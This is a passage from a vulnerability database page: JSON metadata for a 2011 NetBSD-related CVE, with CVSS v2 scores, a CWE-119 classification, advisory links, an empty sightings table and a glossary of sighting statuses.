"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-05-09T19:55:03.553",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"source": "cve@mitre.org",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/668220"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/668220"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.